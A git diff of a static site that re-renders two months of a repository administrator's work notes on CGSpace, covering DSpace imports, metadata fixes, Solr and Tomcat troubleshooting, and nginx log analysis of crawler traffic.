<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -46,7 +46,7 @@ After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s luck
Run system updates on DSpace Test (linode19) and reboot it
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ Run system updates on DSpace Test (linode19) and reboot it
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -127,7 +127,7 @@ Run system updates on DSpace Test (linode19) and reboot it
<p class="blog-post-meta">
<time datetime="2019-08-03T12:39:51+03:00">Sat Aug 03, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -194,7 +194,7 @@ Run system updates on DSpace Test (linode19) and reboot it
</ul>
</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/^.*.*$/)),
isNotNull(value.match(/^.*é.*$/)),
isNotNull(value.match(/^.*á.*$/)),
@ -235,17 +235,17 @@ Run system updates on DSpace Test (linode19) and reboot it
</ul>
</li>
</ul>
<pre><code># /opt/certbot-auto renew --standalone --pre-hook &quot;/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld&quot; --post-hook &quot;/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx&quot;
<pre tabindex="0"><code># /opt/certbot-auto renew --standalone --pre-hook &#34;/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld&#34; --post-hook &#34;/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx&#34;
</code></pre><ul>
<li>It is important that the firewall starts back up before the Docker container or else Docker will complain about missing iptables chains</li>
<li>Also, I updated to the latest TLS Intermediate settings as appropriate for Ubuntu 18.04&rsquo;s <a href="https://ssl-config.mozilla.org/#server=nginx&amp;server-version=1.16.0&amp;config=intermediate&amp;openssl-version=1.1.0g&amp;hsts=false&amp;ocsp=false">OpenSSL 1.1.0g with nginx 1.16.0</a></li>
<li>Run all system updates on AReS dev server (linode20) and reboot it</li>
<li>Get a list of all PDFs from the Bioversity migration that fail to download and save them so I can try again with a different path in the URL:</li>
</ul>
<pre><code>$ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
$ grep -B1 &quot;Download failed&quot; /tmp/2019-08-08-download-pdfs.txt | grep &quot;Downloading&quot; | sed -e 's/&gt; Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 &gt; /tmp/user-upload.csv
<pre tabindex="0"><code>$ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload.csv
$ ./generate-thumbnails.py -i /tmp/user-upload.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs2.txt
$ grep -B1 &quot;Download failed&quot; /tmp/2019-08-08-download-pdfs2.txt | grep &quot;Downloading&quot; | sed -e 's/&gt; Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 &gt; /tmp/user-upload2.csv
$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs2.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload2.csv
$ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs3.txt
</code></pre><ul>
<li>
@ -277,7 +277,7 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
</ul>
</li>
</ul>
<pre><code>proxy_set_header Host dev.ares.codeobia.com;
<pre tabindex="0"><code>proxy_set_header Host dev.ares.codeobia.com;
</code></pre><ul>
<li>Though I am really wondering why this happened now, because the configuration has been working for months&hellip;</li>
<li>Improve the output of the suspicious characters check in <a href="https://github.com/alanorth/csv-metadata-quality">csv-metadata-quality</a> script and tag version 0.2.0</li>
@ -329,7 +329,7 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
<ul>
<li>Create a test user on DSpace Test for Mohammad Salem to attempt depositing:</li>
</ul>
<pre><code>$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p 'domoamaaa'
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p &#39;domoamaaa&#39;
</code></pre><ul>
<li>Create and merge a pull request (<a href="https://github.com/ilri/DSpace/pull/429">#429</a>) to add eleven new CCAFS Phase II Project Tags to CGSpace</li>
<li>Atmire responded to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">Solr cores issue</a> last week, but they could not reproduce the issue
@ -339,13 +339,13 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
</li>
<li>Testing an import of 1,429 Bioversity items (metadata only) on my local development machine and got an error with Java memory after about 1,000 items:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
<pre tabindex="0"><code>$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
...
java.lang.OutOfMemoryError: GC overhead limit exceeded
</code></pre><ul>
<li>I increased the heap size to 1536m and tried again:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1536m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1536m&#34;
$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
</code></pre><ul>
<li>This time it succeeded, and using VisualVM I noticed that the import process used a maximum of 620MB of RAM</li>
@ -361,7 +361,7 @@ $ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
</ul>
</li>
</ul>
<pre><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
$ dspace metadata-import -f /tmp/bioversity1.csv -e blah@blah.com
$ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
</code></pre><ul>
@ -377,7 +377,7 @@ $ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
<li>Deploy Tomcat 7.0.96 and PostgreSQL JDBC 42.2.6 driver on CGSpace (linde18)</li>
<li>After restarting Tomcat one of the Solr statistics cores failed to start up:</li>
</ul>
<pre><code>statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>I decided to run all system updates on the server and reboot it</li>
<li>After reboot the statistics-2018 core failed to load so I restarted <code>tomcat7</code> again</li>
@ -393,7 +393,7 @@ $ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
</ul>
</li>
</ul>
<pre><code>import os
<pre tabindex="0"><code>import os
return os.path.basename(value)
</code></pre><ul>
@ -429,7 +429,7 @@ return os.path.basename(value)
</ul>
</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
</code></pre><ul>
<li>Apply the corrections on CGSpace and DSpace Test
<ul>
@ -437,7 +437,7 @@ return os.path.basename(value)
</ul>
</li>
</ul>
<pre><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 81m47.057s
user 8m5.265s
@ -478,21 +478,21 @@ sys 2m24.715s
</ul>
</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
COPY 65597
</code></pre><ul>
<li>Then I created a new CSV with two author columns (edit title of second column after):</li>
</ul>
<pre><code>$ csvcut -c dc.contributor.author,dc.contributor.author /tmp/2019-08-28-all-authors.csv &gt; /tmp/all-authors.csv
<pre tabindex="0"><code>$ csvcut -c dc.contributor.author,dc.contributor.author /tmp/2019-08-28-all-authors.csv &gt; /tmp/all-authors.csv
</code></pre><ul>
<li>Then I ran my script on the new CSV, skipping one of the author columns:</li>
</ul>
<pre><code>$ csv-metadata-quality -u -i /tmp/all-authors.csv -o /tmp/authors.csv -x dc.contributor.author
<pre tabindex="0"><code>$ csv-metadata-quality -u -i /tmp/all-authors.csv -o /tmp/authors.csv -x dc.contributor.author
</code></pre><ul>
<li>This fixed a bunch of issues with spaces, commas, unneccesary Unicode characters, etc</li>
<li>Then I ran the corrections on my test server and there were 185 of them!</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correctauthor
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correctauthor
</code></pre><ul>
<li>I very well might run these on CGSpace soon&hellip;</li>
</ul>
@ -506,7 +506,7 @@ COPY 65597
</ul>
</li>
</ul>
<pre><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &quot;*.xsl&quot; -exec ./cgcore-xsl-replacements.sed {} \;
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &#34;*.xsl&#34; -exec ./cgcore-xsl-replacements.sed {} \;
</code></pre><ul>
<li>I think I got everything in the XMLUI themes, but there may be some things I should check once I get a deployment up and running:
<ul>
@ -526,7 +526,7 @@ COPY 65597
</ul>
</li>
</ul>
<pre><code>&quot;handles&quot;:[&quot;10986/30568&quot;,&quot;10568/97825&quot;],&quot;handle&quot;:&quot;10986/30568&quot;
<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10986/30568&#34;,&#34;10568/97825&#34;],&#34;handle&#34;:&#34;10986/30568&#34;
</code></pre><ul>
<li>So this is the same issue we had before, where Altmetric <em>knows</em> this Handle is associated with a DOI that has a score, but the client-side JavaScript code doesn&rsquo;t show it because it seems to a secondary handle or something</li>
</ul>
@ -535,7 +535,7 @@ COPY 65597
<li>Run system updates on DSpace Test (linode19) and reboot the server</li>
<li>Run the author fixes on DSpace Test and CGSpace and start a full Discovery re-index:</li>
</ul>
<pre><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 90m47.967s
user 8m12.826s
@ -573,15 +573,15 @@ sys 2m27.496s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -12,7 +12,7 @@
Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -23,7 +23,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -49,7 +49,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -60,7 +60,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -72,7 +72,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
7249 2a01:7e00::f03c:91ff:fe18:7396
9124 45.5.186.2
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -102,12 +102,12 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -153,7 +153,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<p class="blog-post-meta">
<time datetime="2019-09-01T10:17:51+03:00">Sun Sep 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -163,7 +163,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -174,7 +174,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -189,18 +189,18 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<li><code>3.94.211.189</code> is MauiBot, and most of its requests are to Discovery and get rate limited with HTTP 503</li>
<li><code>163.172.71.23</code> is some IP on Online SAS in France and its user agent is:</li>
</ul>
<pre><code>Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
<pre tabindex="0"><code>Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
</code></pre><ul>
<li>It actually got mostly HTTP 200 responses:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | grep 163.172.71.23 | awk '{print $9}' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | awk &#39;{print $9}&#39; | sort | uniq -c
1775 200
703 499
72 503
</code></pre><ul>
<li>And it was mostly requesting Discover pages:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | grep 163.172.71.23 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
2350 discover
71 handle
</code></pre><ul>
@ -279,16 +279,16 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
</ul>
</li>
</ul>
<pre><code>2019-09-15 15:32:18,137 WARN org.apache.cocoon.components.xslt.TraxErrorListener - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
<pre tabindex="0"><code>2019-09-15 15:32:18,137 WARN org.apache.cocoon.components.xslt.TraxErrorListener - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
</code></pre><ul>
<li>Around the same time I see the following in the DSpace log:</li>
</ul>
<pre><code>2019-09-15 15:32:18,079 INFO org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644
2019-09-15 15:32:18,135 WARN org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name=&quot;METSRIGHTS&quot;
<pre tabindex="0"><code>2019-09-15 15:32:18,079 INFO org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644
2019-09-15 15:32:18,135 WARN org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name=&#34;METSRIGHTS&#34;
</code></pre><ul>
<li>I see a lot of these errors today, but not earlier this month:</li>
</ul>
<pre><code># grep -c 'Cannot find named plugin' dspace.log.2019-09-*
<pre tabindex="0"><code># grep -c &#39;Cannot find named plugin&#39; dspace.log.2019-09-*
dspace.log.2019-09-01:0
dspace.log.2019-09-02:0
dspace.log.2019-09-03:0
@ -307,9 +307,9 @@ dspace.log.2019-09-15:808
</code></pre><ul>
<li>Something must have happened when I restarted Tomcat a few hours ago, because earlier in the DSpace log I see a bunch of errors like this:</li>
</ul>
<pre><code>2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.METSRightsCrosswalk&quot;, name=&quot;METSRIGHTS&quot;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.OREDisseminationCrosswalk&quot;, name=&quot;ore&quot;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.DIMDisseminationCrosswalk&quot;, name=&quot;dim&quot;
<pre tabindex="0"><code>2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.METSRightsCrosswalk&#34;, name=&#34;METSRIGHTS&#34;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.OREDisseminationCrosswalk&#34;, name=&#34;ore&#34;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.DIMDisseminationCrosswalk&#34;, name=&#34;dim&#34;
</code></pre><ul>
<li>I restarted Tomcat and the item views came back, but then the Solr statistics cores didn&rsquo;t all load properly
<ul>
@ -321,14 +321,14 @@ dspace.log.2019-09-15:808
<ul>
<li>For some reason my podman PostgreSQL container isn&rsquo;t working so I had to use Docker to re-create it for my testing work today:</li>
</ul>
<pre><code># docker pull docker.io/library/postgres:9.6-alpine
<pre tabindex="0"><code># docker pull docker.io/library/postgres:9.6-alpine
# docker create volume dspacedb_data
# docker run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-08-31.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>Elizabeth from CIAT sent me a list of sixteen authors who need to have their ORCID identifiers tagged with their publications
@ -338,27 +338,27 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Kihara, Job&quot;,&quot;Job Kihara: 0000-0002-4394-9553&quot;
&quot;Twyman, Jennifer&quot;,&quot;Jennifer Twyman: 0000-0002-8581-5668&quot;
&quot;Ishitani, Manabu&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Arango, Jacobo&quot;,&quot;Jacobo Arango: 0000-0002-4828-9398&quot;
&quot;Chavarriaga Aguirre, Paul&quot;,&quot;Paul Chavarriaga-Aguirre: 0000-0001-7579-3250&quot;
&quot;Paul, Birthe&quot;,&quot;Birthe Paul: 0000-0002-5994-5354&quot;
&quot;Eitzinger, Anton&quot;,&quot;Anton Eitzinger: 0000-0001-7317-3381&quot;
&quot;Hoek, Rein van der&quot;,&quot;Rein van der Hoek: 0000-0003-4528-7669&quot;
&quot;Aranzales Rondón, Ericson&quot;,&quot;Ericson Aranzales Rondon: 0000-0001-7487-9909&quot;
&quot;Staiger-Rivas, Simone&quot;,&quot;Simone Staiger: 0000-0002-3539-0817&quot;
&quot;de Haan, Stef&quot;,&quot;Stef de Haan: 0000-0001-8690-1886&quot;
&quot;Pulleman, Mirjam&quot;,&quot;Mirjam Pulleman: 0000-0001-9950-0176&quot;
&quot;Abera, Wuletawu&quot;,&quot;Wuletawu Abera: 0000-0002-3657-5223&quot;
&quot;Tamene, Lulseged&quot;,&quot;Lulseged Tamene: 0000-0002-3806-8890&quot;
&quot;Andrieu, Nadine&quot;,&quot;Nadine Andrieu: 0000-0001-9558-9302&quot;
&quot;Ramírez-Villegas, Julián&quot;,&quot;Julian Ramirez-Villegas: 0000-0002-8044-583X&quot;
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Kihara, Job&#34;,&#34;Job Kihara: 0000-0002-4394-9553&#34;
&#34;Twyman, Jennifer&#34;,&#34;Jennifer Twyman: 0000-0002-8581-5668&#34;
&#34;Ishitani, Manabu&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Arango, Jacobo&#34;,&#34;Jacobo Arango: 0000-0002-4828-9398&#34;
&#34;Chavarriaga Aguirre, Paul&#34;,&#34;Paul Chavarriaga-Aguirre: 0000-0001-7579-3250&#34;
&#34;Paul, Birthe&#34;,&#34;Birthe Paul: 0000-0002-5994-5354&#34;
&#34;Eitzinger, Anton&#34;,&#34;Anton Eitzinger: 0000-0001-7317-3381&#34;
&#34;Hoek, Rein van der&#34;,&#34;Rein van der Hoek: 0000-0003-4528-7669&#34;
